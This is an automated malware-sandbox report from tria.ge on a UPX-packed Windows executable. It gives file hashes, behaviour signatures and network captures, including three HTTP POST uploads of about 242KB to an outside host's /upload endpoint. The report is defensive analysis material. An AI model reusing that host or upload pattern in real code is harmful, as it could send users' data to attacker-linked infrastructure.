Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

5

Static

static

5

9048bfe7b2...1N.exe

windows7-x64

5

9048bfe7b2...1N.exe

windows10-2004-x64

5

Analysis

  • max time kernel
    92s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13/10/2024, 18:07 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe

  • Size

    236KB

  • MD5

    a2e7e82983f710a72ea5e49e9efeb8d0

  • SHA1

    d7b90a99aca0e3efe942743e0418f57d7d7eeb61

  • SHA256

    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721

  • SHA512

    4da533d8822978e0a9f26ae9bb2b2a7a46994a353a52dea0d49117adb60b374fabc90d07b484c458f286ad84dea0ac6794c1edc83ff68e9a232179b999c95b2a

  • SSDEEP

    3072:7J0Bs3o8A4M3riN6MhGkgS3PL6pb9t16n5OkhBOPC/P/FnncroP9:9wDeM7iNEkgiOb31k1ECvJ/F

Score
5/10
discoveryupx

Malware Config

Signatures

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery

Processes

  • C:\Users\Admin\AppData\Local\Temp\9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    "C:\Users\Admin\AppData\Local\Temp\9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    PID:3052

Network

  • flag-us
    DNS
    wecan.hasthe.technology
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    8.8.8.8:53
    Request
    wecan.hasthe.technology
    IN A
    Response
    wecan.hasthe.technology
    IN A
    104.21.59.199
    wecan.hasthe.technology
    IN A
    172.67.183.40
  • flag-us
    POST
    http://wecan.hasthe.technology/upload
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    104.21.59.199:80
    Request
    POST /upload HTTP/1.1
    Host: wecan.hasthe.technology
    Accept: */*
    Content-Length: 242084
    Expect: 100-continue
    Content-Type: multipart/form-data; boundary=------------------------291b2378a72a171e
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 13 Oct 2024 18:08:25 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 13 Oct 2024 19:08:25 GMT
    Location: https://computernewb.com/collab-vm/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9%2BLjf7LBpUB6BRB98uE7X7jy%2BLR7MQKRBvPFXKtLN7vVK66n3vEWaBSHDPV6bJtYYjeOe4BpTyA3O7XphNDnuBzRf0xmfD%2BBtnC%2BTeZL37VkDIFgMwmHz%2Fuv%2BlEO%2FrCqVjszBk0OIarmA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d21465a0ba894d2-LHR
  • flag-us
    POST
    http://wecan.hasthe.technology/upload
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    104.21.59.199:80
    Request
    POST /upload HTTP/1.1
    Host: wecan.hasthe.technology
    Accept: */*
    Content-Length: 242084
    Expect: 100-continue
    Content-Type: multipart/form-data; boundary=------------------------309121f5eab85c91
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 13 Oct 2024 18:08:55 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 13 Oct 2024 19:08:55 GMT
    Location: https://computernewb.com/collab-vm/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OlPIlML5sxHIOPIMibeuPpsuedRiuXOPiNjXJiwzkge5oyysa2vDEZz2xiND1iHENcocmHPmPrDBCY5l2pkCo134Zy7O2qwvBWoAXLFNJkYJ8tVP3j%2FqfUacmJQss%2BHjTHoDABglDHWIeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d2147198972cd31-LHR
  • flag-us
    POST
    http://wecan.hasthe.technology/upload
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    Remote address:
    104.21.59.199:80
    Request
    POST /upload HTTP/1.1
    Host: wecan.hasthe.technology
    Accept: */*
    Content-Length: 242084
    Expect: 100-continue
    Content-Type: multipart/form-data; boundary=------------------------3bf7de660bf68b58
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Sun, 13 Oct 2024 18:09:26 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 13 Oct 2024 19:09:26 GMT
    Location: https://computernewb.com/collab-vm/
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvJMhUnoGJp644pMyJ9eFvNB0vD5ESPWpzAmuDyqHMnjUYIN5gPtzrhPW%2FWF9QwqJzxsVvi2nVmsMHs4Qb8NGQYeKJKClbdyC5CIJdd7fgegMsepLTQW4OV9tDduiCV9%2BpwwBgj59YK%2FzA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d2147d93e5a955d-LHR
  • 104.21.59.199:80
    http://wecan.hasthe.technology/upload
    http
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    250.2kB
     5.9kB
     198
    125

    HTTP Request

    POST http://wecan.hasthe.technology/upload

    HTTP Response

    301
  • 104.21.59.199:80
    http://wecan.hasthe.technology/upload
    http
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    250.2kB
     5.4kB
     198
    115

    HTTP Request

    POST http://wecan.hasthe.technology/upload

    HTTP Response

    301
  • 104.21.59.199:80
    http://wecan.hasthe.technology/upload
    http
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    250.2kB
     5.9kB
     198
    126

    HTTP Request

    POST http://wecan.hasthe.technology/upload

    HTTP Response

    301
  • 8.8.8.8:53
    wecan.hasthe.technology
    dns
    9048bfe7b28bff2166df471d154da8c1d8cc04e132854c8d89c42ef8431c0721N.exe
    69 B
     101 B
     1
    1

    DNS Request

    wecan.hasthe.technology

    DNS Response

    104.21.59.199
    172.67.183.40

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\rifaien2-D6qLMY88FQENYiVV.exe
    Filesize

    236KB

    MD5

    1114398207d2f1634685495e2c4c638d

    SHA1

    8e6d836c92740e3c96ff19308395701ff4ab77f8

    SHA256

    587a0ae1bca2edd9eef1a7a1d7255c789b01223d2231067e1259909d1e6698bf

    SHA512

    1a824d504e87a04d03586335a02a270c82e47d8bb2a36c5dd65d468d509f31e0dfbe00b87c4428910f34eacfa365277a545e0cfb5d6b48f18422c650a79e9f70

    Download Submit

  • memory/3052-0-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

  • memory/3052-1-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.